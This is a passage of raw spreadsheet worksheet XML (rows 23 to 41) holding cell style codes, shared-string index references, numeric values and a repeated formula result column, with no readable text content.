      <c r="T23" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U23" s="43" t="s">
        <v>185</v>
      </c>
      <c r="V23" s="5" t="s">
        <v>56</v>
      </c>
      <c r="W23" s="37" t="s">
        <v>185</v>
      </c>
      <c r="X23" s="37" t="s">
        <v>1148</v>
      </c>
      <c r="Y23" s="37" t="s">
        <v>1149</v>
      </c>
      <c r="Z23" s="38" t="s">
        <v>1150</v>
      </c>
      <c r="AA23" s="39" t="s">
        <v>1151</v>
      </c>
      <c r="AB23" s="38" t="s">
        <v>1152</v>
      </c>
      <c r="AC23" s="40">
        <v>32603.0</v>
      </c>
      <c r="AD23" s="5"/>
      <c r="AE23" s="14"/>
      <c r="AF23" s="14"/>
    </row>
    <row r="24">
      <c r="A24" s="6">
        <f t="shared" si="1"/>
        <v>0.6416431227</v>
      </c>
      <c r="B24" s="29">
        <v>1.0</v>
      </c>
      <c r="C24" s="14"/>
      <c r="D24" s="14"/>
      <c r="E24" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F24" s="14"/>
      <c r="G24" s="29">
        <v>7.0</v>
      </c>
      <c r="H24" s="29">
        <v>28411.0</v>
      </c>
      <c r="I24" s="29">
        <v>174682.0</v>
      </c>
      <c r="J24" s="15"/>
      <c r="K24" s="15"/>
      <c r="L24" s="15"/>
      <c r="M24" s="14"/>
      <c r="N24" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O24" s="29">
        <v>2.0</v>
      </c>
      <c r="P24" s="29">
        <v>1.0</v>
      </c>
      <c r="Q24" s="15"/>
      <c r="R24" s="15"/>
      <c r="S24" s="15"/>
      <c r="T24" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U24" s="5" t="s">
        <v>185</v>
      </c>
      <c r="V24" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W24" s="37" t="s">
        <v>185</v>
      </c>
      <c r="X24" s="37" t="s">
        <v>185</v>
      </c>
      <c r="Y24" s="37" t="s">
        <v>190</v>
      </c>
      <c r="Z24" s="38" t="s">
        <v>1153</v>
      </c>
      <c r="AA24" s="39" t="s">
        <v>1154</v>
      </c>
      <c r="AB24" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC24" s="40">
        <v>182869.0</v>
      </c>
      <c r="AD24" s="5"/>
      <c r="AE24" s="14"/>
      <c r="AF24" s="14"/>
    </row>
    <row r="25">
      <c r="A25" s="6">
        <f t="shared" si="1"/>
        <v>0.6545850195</v>
      </c>
      <c r="B25" s="29">
        <v>1.0</v>
      </c>
      <c r="C25" s="15"/>
      <c r="D25" s="14"/>
      <c r="E25" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F25" s="14"/>
      <c r="G25" s="29">
        <v>6.0</v>
      </c>
      <c r="H25" s="29">
        <v>875.0</v>
      </c>
      <c r="I25" s="29">
        <v>149304.0</v>
      </c>
      <c r="J25" s="15"/>
      <c r="K25" s="29">
        <v>6253.0</v>
      </c>
      <c r="L25" s="15"/>
      <c r="M25" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N25" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O25" s="29">
        <v>1.0</v>
      </c>
      <c r="P25" s="29">
        <v>0.0</v>
      </c>
      <c r="Q25" s="29">
        <v>0.0</v>
      </c>
      <c r="R25" s="15"/>
      <c r="S25" s="15"/>
      <c r="T25" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U25" s="43" t="s">
        <v>185</v>
      </c>
      <c r="V25" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W25" s="37" t="s">
        <v>185</v>
      </c>
      <c r="X25" s="37" t="s">
        <v>185</v>
      </c>
      <c r="Y25" s="37" t="s">
        <v>1155</v>
      </c>
      <c r="Z25" s="38" t="s">
        <v>1156</v>
      </c>
      <c r="AA25" s="39" t="s">
        <v>1157</v>
      </c>
      <c r="AB25" s="38" t="s">
        <v>1158</v>
      </c>
      <c r="AC25" s="40">
        <v>160408.0</v>
      </c>
      <c r="AD25" s="5"/>
      <c r="AE25" s="14"/>
      <c r="AF25" s="14"/>
    </row>
    <row r="26">
      <c r="A26" s="6">
        <f t="shared" si="1"/>
        <v>0.08669199477</v>
      </c>
      <c r="B26" s="29">
        <v>1.0</v>
      </c>
      <c r="C26" s="14"/>
      <c r="D26" s="14"/>
      <c r="E26" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F26" s="14"/>
      <c r="G26" s="29">
        <v>2.0</v>
      </c>
      <c r="H26" s="29">
        <v>294.0</v>
      </c>
      <c r="I26" s="29">
        <v>213065.0</v>
      </c>
      <c r="J26" s="15"/>
      <c r="K26" s="15"/>
      <c r="L26" s="15"/>
      <c r="M26" s="15"/>
      <c r="N26" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O26" s="29">
        <v>1.0</v>
      </c>
      <c r="P26" s="29">
        <v>4.0</v>
      </c>
      <c r="Q26" s="15"/>
      <c r="R26" s="15"/>
      <c r="S26" s="15"/>
      <c r="T26" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U26" s="5" t="s">
        <v>185</v>
      </c>
      <c r="V26" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W26" s="37" t="s">
        <v>185</v>
      </c>
      <c r="X26" s="37" t="s">
        <v>185</v>
      </c>
      <c r="Y26" s="37" t="s">
        <v>1159</v>
      </c>
      <c r="Z26" s="38" t="s">
        <v>1160</v>
      </c>
      <c r="AA26" s="39" t="s">
        <v>1161</v>
      </c>
      <c r="AB26" s="38" t="s">
        <v>1162</v>
      </c>
      <c r="AC26" s="40">
        <v>214126.0</v>
      </c>
      <c r="AD26" s="5"/>
      <c r="AE26" s="14"/>
      <c r="AF26" s="14"/>
    </row>
    <row r="27">
      <c r="A27" s="6">
        <f t="shared" si="1"/>
        <v>0.906452104</v>
      </c>
      <c r="B27" s="29">
        <v>1.0</v>
      </c>
      <c r="C27" s="29">
        <v>197185.0</v>
      </c>
      <c r="D27" s="14"/>
      <c r="E27" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F27" s="14"/>
      <c r="G27" s="29">
        <v>2.0</v>
      </c>
      <c r="H27" s="29">
        <v>1724.0</v>
      </c>
      <c r="I27" s="29">
        <v>190709.0</v>
      </c>
      <c r="J27" s="15"/>
      <c r="K27" s="15"/>
      <c r="L27" s="15"/>
      <c r="M27" s="15"/>
      <c r="N27" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O27" s="29">
        <v>1.0</v>
      </c>
      <c r="P27" s="29">
        <v>1.0</v>
      </c>
      <c r="Q27" s="15"/>
      <c r="R27" s="15"/>
      <c r="S27" s="15"/>
      <c r="T27" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U27" s="5" t="s">
        <v>185</v>
      </c>
      <c r="V27" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W27" s="37" t="s">
        <v>1079</v>
      </c>
      <c r="X27" s="37" t="s">
        <v>1079</v>
      </c>
      <c r="Y27" s="37" t="s">
        <v>1163</v>
      </c>
      <c r="Z27" s="38" t="s">
        <v>1164</v>
      </c>
      <c r="AA27" s="39" t="s">
        <v>1165</v>
      </c>
      <c r="AB27" s="38" t="s">
        <v>1166</v>
      </c>
      <c r="AC27" s="40">
        <v>197165.0</v>
      </c>
      <c r="AD27" s="5"/>
      <c r="AE27" s="14"/>
      <c r="AF27" s="14"/>
    </row>
    <row r="28">
      <c r="A28" s="6">
        <f t="shared" si="1"/>
        <v>0.357933063</v>
      </c>
      <c r="B28" s="29">
        <v>1.0</v>
      </c>
      <c r="C28" s="29">
        <v>84243.0</v>
      </c>
      <c r="D28" s="14"/>
      <c r="E28" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F28" s="14"/>
      <c r="G28" s="29">
        <v>37.0</v>
      </c>
      <c r="H28" s="29">
        <v>13447.0</v>
      </c>
      <c r="I28" s="29">
        <v>69348.0</v>
      </c>
      <c r="J28" s="15"/>
      <c r="K28" s="29">
        <v>-1.0</v>
      </c>
      <c r="L28" s="15"/>
      <c r="M28" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N28" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O28" s="29">
        <v>2.0</v>
      </c>
      <c r="P28" s="29">
        <v>3.0</v>
      </c>
      <c r="Q28" s="15"/>
      <c r="R28" s="15"/>
      <c r="S28" s="15"/>
      <c r="T28" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U28" s="5" t="s">
        <v>185</v>
      </c>
      <c r="V28" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W28" s="37" t="s">
        <v>185</v>
      </c>
      <c r="X28" s="37" t="s">
        <v>185</v>
      </c>
      <c r="Y28" s="37" t="s">
        <v>1167</v>
      </c>
      <c r="Z28" s="38" t="s">
        <v>1168</v>
      </c>
      <c r="AA28" s="39" t="s">
        <v>1169</v>
      </c>
      <c r="AB28" s="38" t="s">
        <v>1170</v>
      </c>
      <c r="AC28" s="40">
        <v>84229.0</v>
      </c>
      <c r="AD28" s="5"/>
      <c r="AE28" s="14"/>
      <c r="AF28" s="14"/>
    </row>
    <row r="29">
      <c r="A29" s="6">
        <f t="shared" si="1"/>
        <v>0.5149642167</v>
      </c>
      <c r="B29" s="29">
        <v>1.0</v>
      </c>
      <c r="C29" s="15"/>
      <c r="D29" s="14"/>
      <c r="E29" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F29" s="14"/>
      <c r="G29" s="29">
        <v>3.0</v>
      </c>
      <c r="H29" s="29">
        <v>103.0</v>
      </c>
      <c r="I29" s="29">
        <v>70176.0</v>
      </c>
      <c r="J29" s="15"/>
      <c r="K29" s="15"/>
      <c r="L29" s="15"/>
      <c r="M29" s="15"/>
      <c r="N29" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O29" s="29">
        <v>1.0</v>
      </c>
      <c r="P29" s="29">
        <v>0.0</v>
      </c>
      <c r="Q29" s="15"/>
      <c r="R29" s="15"/>
      <c r="S29" s="15"/>
      <c r="T29" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U29" s="5" t="s">
        <v>185</v>
      </c>
      <c r="V29" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W29" s="37" t="s">
        <v>185</v>
      </c>
      <c r="X29" s="37" t="s">
        <v>185</v>
      </c>
      <c r="Y29" s="37" t="s">
        <v>1171</v>
      </c>
      <c r="Z29" s="38" t="s">
        <v>1172</v>
      </c>
      <c r="AA29" s="39" t="s">
        <v>1173</v>
      </c>
      <c r="AB29" s="38" t="s">
        <v>1174</v>
      </c>
      <c r="AC29" s="40">
        <v>179130.0</v>
      </c>
      <c r="AD29" s="5"/>
      <c r="AE29" s="14"/>
      <c r="AF29" s="14"/>
    </row>
    <row r="30">
      <c r="A30" s="6">
        <f t="shared" si="1"/>
        <v>0.7547444727</v>
      </c>
      <c r="B30" s="29">
        <v>1.0</v>
      </c>
      <c r="C30" s="29">
        <v>188838.0</v>
      </c>
      <c r="D30" s="14"/>
      <c r="E30" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F30" s="14"/>
      <c r="G30" s="29">
        <v>1.0</v>
      </c>
      <c r="H30" s="29">
        <v>192.0</v>
      </c>
      <c r="I30" s="29">
        <v>98457.0</v>
      </c>
      <c r="J30" s="15"/>
      <c r="K30" s="29">
        <v>98457.0</v>
      </c>
      <c r="L30" s="15"/>
      <c r="M30" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N30" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O30" s="29">
        <v>1.0</v>
      </c>
      <c r="P30" s="29">
        <v>2.0</v>
      </c>
      <c r="Q30" s="15"/>
      <c r="R30" s="15"/>
      <c r="S30" s="15"/>
      <c r="T30" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U30" s="5" t="s">
        <v>185</v>
      </c>
      <c r="V30" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W30" s="37" t="s">
        <v>185</v>
      </c>
      <c r="X30" s="37" t="s">
        <v>185</v>
      </c>
      <c r="Y30" s="37" t="s">
        <v>1175</v>
      </c>
      <c r="Z30" s="38" t="s">
        <v>1176</v>
      </c>
      <c r="AA30" s="39" t="s">
        <v>1177</v>
      </c>
      <c r="AB30" s="38" t="s">
        <v>1178</v>
      </c>
      <c r="AC30" s="40">
        <v>188837.0</v>
      </c>
      <c r="AD30" s="5"/>
      <c r="AE30" s="14"/>
      <c r="AF30" s="14"/>
    </row>
    <row r="31">
      <c r="A31" s="6">
        <f t="shared" si="1"/>
        <v>0.06618660501</v>
      </c>
      <c r="B31" s="29">
        <v>1.0</v>
      </c>
      <c r="C31" s="29">
        <v>122747.0</v>
      </c>
      <c r="D31" s="14"/>
      <c r="E31" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F31" s="14"/>
      <c r="G31" s="29">
        <v>1.0</v>
      </c>
      <c r="H31" s="29">
        <v>8567.0</v>
      </c>
      <c r="I31" s="29">
        <v>87457.0</v>
      </c>
      <c r="J31" s="15"/>
      <c r="K31" s="29">
        <v>87457.0</v>
      </c>
      <c r="L31" s="15"/>
      <c r="M31" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N31" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O31" s="29">
        <v>2.0</v>
      </c>
      <c r="P31" s="29">
        <v>7.0</v>
      </c>
      <c r="Q31" s="15"/>
      <c r="R31" s="15"/>
      <c r="S31" s="15"/>
      <c r="T31" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U31" s="5" t="s">
        <v>185</v>
      </c>
      <c r="V31" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W31" s="18" t="s">
        <v>185</v>
      </c>
      <c r="X31" s="18" t="s">
        <v>185</v>
      </c>
      <c r="Y31" s="18" t="s">
        <v>190</v>
      </c>
      <c r="Z31" s="38" t="s">
        <v>1179</v>
      </c>
      <c r="AA31" s="39" t="s">
        <v>1180</v>
      </c>
      <c r="AB31" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC31" s="40">
        <v>122731.0</v>
      </c>
      <c r="AD31" s="5"/>
      <c r="AE31" s="14"/>
      <c r="AF31" s="14"/>
    </row>
    <row r="32">
      <c r="A32" s="6">
        <f t="shared" si="1"/>
        <v>0.8967821354</v>
      </c>
      <c r="B32" s="29">
        <v>1.0</v>
      </c>
      <c r="C32" s="15"/>
      <c r="D32" s="14"/>
      <c r="E32" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F32" s="14"/>
      <c r="G32" s="29">
        <v>8.0</v>
      </c>
      <c r="H32" s="29">
        <v>905.0</v>
      </c>
      <c r="I32" s="29">
        <v>90017.0</v>
      </c>
      <c r="J32" s="15"/>
      <c r="K32" s="29">
        <v>6253.0</v>
      </c>
      <c r="L32" s="15"/>
      <c r="M32" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N32" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O32" s="29">
        <v>1.0</v>
      </c>
      <c r="P32" s="29">
        <v>4.0</v>
      </c>
      <c r="Q32" s="15"/>
      <c r="R32" s="15"/>
      <c r="S32" s="15"/>
      <c r="T32" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U32" s="5" t="s">
        <v>185</v>
      </c>
      <c r="V32" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W32" s="41" t="s">
        <v>185</v>
      </c>
      <c r="X32" s="18" t="s">
        <v>185</v>
      </c>
      <c r="Y32" s="18" t="s">
        <v>1181</v>
      </c>
      <c r="Z32" s="38" t="s">
        <v>1182</v>
      </c>
      <c r="AA32" s="39" t="s">
        <v>1183</v>
      </c>
      <c r="AB32" s="38" t="s">
        <v>1184</v>
      </c>
      <c r="AC32" s="40">
        <v>103501.0</v>
      </c>
      <c r="AD32" s="5"/>
      <c r="AE32" s="14"/>
      <c r="AF32" s="14"/>
    </row>
    <row r="33">
      <c r="A33" s="6">
        <f t="shared" si="1"/>
        <v>0.3693097406</v>
      </c>
      <c r="B33" s="29">
        <v>1.0</v>
      </c>
      <c r="C33" s="15"/>
      <c r="D33" s="14"/>
      <c r="E33" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F33" s="14"/>
      <c r="G33" s="29">
        <v>4.0</v>
      </c>
      <c r="H33" s="29">
        <v>346.0</v>
      </c>
      <c r="I33" s="29">
        <v>524.0</v>
      </c>
      <c r="J33" s="15"/>
      <c r="K33" s="29">
        <v>524.0</v>
      </c>
      <c r="L33" s="15"/>
      <c r="M33" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N33" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O33" s="29">
        <v>1.0</v>
      </c>
      <c r="P33" s="29">
        <v>0.0</v>
      </c>
      <c r="Q33" s="15"/>
      <c r="R33" s="15"/>
      <c r="S33" s="15"/>
      <c r="T33" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U33" s="5" t="s">
        <v>185</v>
      </c>
      <c r="V33" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W33" s="41" t="s">
        <v>185</v>
      </c>
      <c r="X33" s="41" t="s">
        <v>185</v>
      </c>
      <c r="Y33" s="18" t="s">
        <v>1185</v>
      </c>
      <c r="Z33" s="38" t="s">
        <v>1186</v>
      </c>
      <c r="AA33" s="39" t="s">
        <v>1187</v>
      </c>
      <c r="AB33" s="38" t="s">
        <v>1188</v>
      </c>
      <c r="AC33" s="40">
        <v>11372.0</v>
      </c>
      <c r="AD33" s="5"/>
      <c r="AE33" s="14"/>
      <c r="AF33" s="14"/>
    </row>
    <row r="34">
      <c r="A34" s="6">
        <f t="shared" si="1"/>
        <v>0.1834489454</v>
      </c>
      <c r="B34" s="29">
        <v>1.0</v>
      </c>
      <c r="C34" s="29">
        <v>48104.0</v>
      </c>
      <c r="D34" s="14"/>
      <c r="E34" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F34" s="14"/>
      <c r="G34" s="29">
        <v>7.0</v>
      </c>
      <c r="H34" s="29">
        <v>404.0</v>
      </c>
      <c r="I34" s="29">
        <v>36700.0</v>
      </c>
      <c r="J34" s="15"/>
      <c r="K34" s="29">
        <v>33.0</v>
      </c>
      <c r="L34" s="15"/>
      <c r="M34" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N34" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O34" s="29">
        <v>4.0</v>
      </c>
      <c r="P34" s="29">
        <v>1.0</v>
      </c>
      <c r="Q34" s="15"/>
      <c r="R34" s="15"/>
      <c r="S34" s="15"/>
      <c r="T34" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U34" s="5" t="s">
        <v>185</v>
      </c>
      <c r="V34" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W34" s="41" t="s">
        <v>185</v>
      </c>
      <c r="X34" s="18" t="s">
        <v>185</v>
      </c>
      <c r="Y34" s="18" t="s">
        <v>1189</v>
      </c>
      <c r="Z34" s="38" t="s">
        <v>1190</v>
      </c>
      <c r="AA34" s="39" t="s">
        <v>1191</v>
      </c>
      <c r="AB34" s="38" t="s">
        <v>1192</v>
      </c>
      <c r="AC34" s="40">
        <v>48101.0</v>
      </c>
      <c r="AD34" s="5"/>
      <c r="AE34" s="14"/>
      <c r="AF34" s="14"/>
    </row>
    <row r="35">
      <c r="A35" s="6">
        <f t="shared" si="1"/>
        <v>0.02627061555</v>
      </c>
      <c r="B35" s="29">
        <v>1.0</v>
      </c>
      <c r="C35" s="29">
        <v>97200.0</v>
      </c>
      <c r="D35" s="14"/>
      <c r="E35" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F35" s="14"/>
      <c r="G35" s="29">
        <v>1.0</v>
      </c>
      <c r="H35" s="29">
        <v>1781.0</v>
      </c>
      <c r="I35" s="29">
        <v>83778.0</v>
      </c>
      <c r="J35" s="15"/>
      <c r="K35" s="29">
        <v>83778.0</v>
      </c>
      <c r="L35" s="15"/>
      <c r="M35" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N35" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O35" s="29">
        <v>3.0</v>
      </c>
      <c r="P35" s="29">
        <v>4.0</v>
      </c>
      <c r="Q35" s="15"/>
      <c r="R35" s="15"/>
      <c r="S35" s="15"/>
      <c r="T35" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U35" s="5" t="s">
        <v>1193</v>
      </c>
      <c r="V35" s="5" t="s">
        <v>1194</v>
      </c>
      <c r="W35" s="41" t="s">
        <v>185</v>
      </c>
      <c r="X35" s="18" t="s">
        <v>31</v>
      </c>
      <c r="Y35" s="18" t="s">
        <v>1195</v>
      </c>
      <c r="Z35" s="38" t="s">
        <v>1196</v>
      </c>
      <c r="AA35" s="39" t="s">
        <v>1197</v>
      </c>
      <c r="AB35" s="38" t="s">
        <v>1198</v>
      </c>
      <c r="AC35" s="40">
        <v>97193.0</v>
      </c>
      <c r="AD35" s="5"/>
      <c r="AE35" s="14"/>
      <c r="AF35" s="14"/>
    </row>
    <row r="36">
      <c r="A36" s="6">
        <f t="shared" si="1"/>
        <v>0.6524511881</v>
      </c>
      <c r="B36" s="29">
        <v>1.0</v>
      </c>
      <c r="C36" s="15"/>
      <c r="D36" s="14"/>
      <c r="E36" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F36" s="14"/>
      <c r="G36" s="29">
        <v>3.0</v>
      </c>
      <c r="H36" s="29">
        <v>243.0</v>
      </c>
      <c r="I36" s="29">
        <v>140754.0</v>
      </c>
      <c r="J36" s="15"/>
      <c r="K36" s="15"/>
      <c r="L36" s="15"/>
      <c r="M36" s="15"/>
      <c r="N36" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O36" s="29">
        <v>2.0</v>
      </c>
      <c r="P36" s="29">
        <v>0.0</v>
      </c>
      <c r="Q36" s="15"/>
      <c r="R36" s="15"/>
      <c r="S36" s="15"/>
      <c r="T36" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U36" s="5" t="s">
        <v>61</v>
      </c>
      <c r="V36" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W36" s="37" t="s">
        <v>61</v>
      </c>
      <c r="X36" s="37" t="s">
        <v>61</v>
      </c>
      <c r="Y36" s="37" t="s">
        <v>1199</v>
      </c>
      <c r="Z36" s="38" t="s">
        <v>1200</v>
      </c>
      <c r="AA36" s="39" t="s">
        <v>1201</v>
      </c>
      <c r="AB36" s="38" t="s">
        <v>1202</v>
      </c>
      <c r="AC36" s="40">
        <v>152675.0</v>
      </c>
      <c r="AD36" s="5"/>
      <c r="AE36" s="14"/>
      <c r="AF36" s="14"/>
    </row>
    <row r="37">
      <c r="A37" s="6">
        <f t="shared" si="1"/>
        <v>0.4122087207</v>
      </c>
      <c r="B37" s="29">
        <v>1.0</v>
      </c>
      <c r="C37" s="14"/>
      <c r="D37" s="14"/>
      <c r="E37" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F37" s="14"/>
      <c r="G37" s="29">
        <v>1.0</v>
      </c>
      <c r="H37" s="29">
        <v>268.0</v>
      </c>
      <c r="I37" s="29">
        <v>1768.0</v>
      </c>
      <c r="J37" s="15"/>
      <c r="K37" s="29">
        <v>9611.0</v>
      </c>
      <c r="L37" s="15"/>
      <c r="M37" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N37" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O37" s="29">
        <v>2.0</v>
      </c>
      <c r="P37" s="29">
        <v>0.0</v>
      </c>
      <c r="Q37" s="15"/>
      <c r="R37" s="15"/>
      <c r="S37" s="15"/>
      <c r="T37" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U37" s="41" t="s">
        <v>61</v>
      </c>
      <c r="V37" s="5" t="s">
        <v>173</v>
      </c>
      <c r="W37" s="41" t="s">
        <v>61</v>
      </c>
      <c r="X37" s="18" t="s">
        <v>113</v>
      </c>
      <c r="Y37" s="18" t="s">
        <v>212</v>
      </c>
      <c r="Z37" s="38" t="s">
        <v>1203</v>
      </c>
      <c r="AA37" s="39" t="s">
        <v>1204</v>
      </c>
      <c r="AB37" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC37" s="40">
        <v>15280.0</v>
      </c>
      <c r="AD37" s="5"/>
      <c r="AE37" s="14"/>
      <c r="AF37" s="14"/>
    </row>
    <row r="38">
      <c r="A38" s="6">
        <f t="shared" si="1"/>
        <v>0.3074934143</v>
      </c>
      <c r="B38" s="29">
        <v>1.0</v>
      </c>
      <c r="C38" s="14"/>
      <c r="D38" s="14"/>
      <c r="E38" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F38" s="14"/>
      <c r="G38" s="29">
        <v>2.0</v>
      </c>
      <c r="H38" s="29">
        <v>101.0</v>
      </c>
      <c r="I38" s="29">
        <v>292329.0</v>
      </c>
      <c r="J38" s="15"/>
      <c r="K38" s="29">
        <v>6253.0</v>
      </c>
      <c r="L38" s="15"/>
      <c r="M38" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N38" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O38" s="29">
        <v>1.0</v>
      </c>
      <c r="P38" s="29">
        <v>3.0</v>
      </c>
      <c r="Q38" s="15"/>
      <c r="R38" s="15"/>
      <c r="S38" s="15"/>
      <c r="T38" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U38" s="5" t="s">
        <v>160</v>
      </c>
      <c r="V38" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W38" s="37" t="s">
        <v>160</v>
      </c>
      <c r="X38" s="37" t="s">
        <v>160</v>
      </c>
      <c r="Y38" s="37" t="s">
        <v>1205</v>
      </c>
      <c r="Z38" s="38" t="s">
        <v>1206</v>
      </c>
      <c r="AA38" s="39" t="s">
        <v>1207</v>
      </c>
      <c r="AB38" s="38" t="s">
        <v>1208</v>
      </c>
      <c r="AC38" s="40">
        <v>269961.0</v>
      </c>
      <c r="AD38" s="5"/>
      <c r="AE38" s="14"/>
      <c r="AF38" s="14"/>
    </row>
    <row r="39">
      <c r="A39" s="6">
        <f t="shared" si="1"/>
        <v>0.2538225526</v>
      </c>
      <c r="B39" s="29">
        <v>1.0</v>
      </c>
      <c r="C39" s="15"/>
      <c r="D39" s="14"/>
      <c r="E39" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F39" s="14"/>
      <c r="G39" s="29">
        <v>2.0</v>
      </c>
      <c r="H39" s="29">
        <v>619.0</v>
      </c>
      <c r="I39" s="29">
        <v>91498.0</v>
      </c>
      <c r="J39" s="15"/>
      <c r="K39" s="15"/>
      <c r="L39" s="15"/>
      <c r="M39" s="14"/>
      <c r="N39" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O39" s="29">
        <v>2.0</v>
      </c>
      <c r="P39" s="29">
        <v>0.0</v>
      </c>
      <c r="Q39" s="15"/>
      <c r="R39" s="15"/>
      <c r="S39" s="15"/>
      <c r="T39" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U39" s="5" t="s">
        <v>160</v>
      </c>
      <c r="V39" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W39" s="41" t="s">
        <v>160</v>
      </c>
      <c r="X39" s="18" t="s">
        <v>160</v>
      </c>
      <c r="Y39" s="18" t="s">
        <v>1209</v>
      </c>
      <c r="Z39" s="38" t="s">
        <v>1210</v>
      </c>
      <c r="AA39" s="39" t="s">
        <v>1211</v>
      </c>
      <c r="AB39" s="38" t="s">
        <v>1212</v>
      </c>
      <c r="AC39" s="40">
        <v>105066.0</v>
      </c>
      <c r="AD39" s="5"/>
      <c r="AE39" s="14"/>
      <c r="AF39" s="14"/>
    </row>
    <row r="40">
      <c r="A40" s="6">
        <f t="shared" si="1"/>
        <v>0.944304023</v>
      </c>
      <c r="B40" s="29">
        <v>1.0</v>
      </c>
      <c r="C40" s="29">
        <v>71704.0</v>
      </c>
      <c r="D40" s="14"/>
      <c r="E40" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F40" s="14"/>
      <c r="G40" s="29">
        <v>133.0</v>
      </c>
      <c r="H40" s="29">
        <v>47618.0</v>
      </c>
      <c r="I40" s="29">
        <v>2264.0</v>
      </c>
      <c r="J40" s="15"/>
      <c r="K40" s="29">
        <v>29252.0</v>
      </c>
      <c r="L40" s="15"/>
      <c r="M40" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N40" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O40" s="29">
        <v>6.0</v>
      </c>
      <c r="P40" s="29">
        <v>10.0</v>
      </c>
      <c r="Q40" s="15"/>
      <c r="R40" s="15"/>
      <c r="S40" s="15"/>
      <c r="T40" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U40" s="5" t="s">
        <v>160</v>
      </c>
      <c r="V40" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W40" s="41" t="s">
        <v>160</v>
      </c>
      <c r="X40" s="41" t="s">
        <v>160</v>
      </c>
      <c r="Y40" s="18" t="s">
        <v>1213</v>
      </c>
      <c r="Z40" s="38" t="s">
        <v>1214</v>
      </c>
      <c r="AA40" s="39" t="s">
        <v>1215</v>
      </c>
      <c r="AB40" s="38" t="s">
        <v>1216</v>
      </c>
      <c r="AC40" s="40">
        <v>71316.0</v>
      </c>
      <c r="AD40" s="5"/>
      <c r="AE40" s="14"/>
      <c r="AF40" s="14"/>
    </row>
    <row r="41">
      <c r="A41" s="6">
        <f t="shared" si="1"/>
        <v>0.1028643804</v>
      </c>
      <c r="B41" s="29">
        <v>1.0</v>
      </c>
      <c r="C41" s="15"/>
      <c r="D41" s="14"/>
      <c r="E41" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F41" s="14"/>
      <c r="G41" s="29">
        <v>4.0</v>
      </c>
      <c r="H41" s="29">
        <v>416.0</v>
      </c>
      <c r="I41" s="29">
        <v>258028.0</v>
      </c>
      <c r="J41" s="15"/>
      <c r="K41" s="29">
        <v>6253.0</v>
      </c>
      <c r="L41" s="15"/>
      <c r="M41" s="36" t="s">
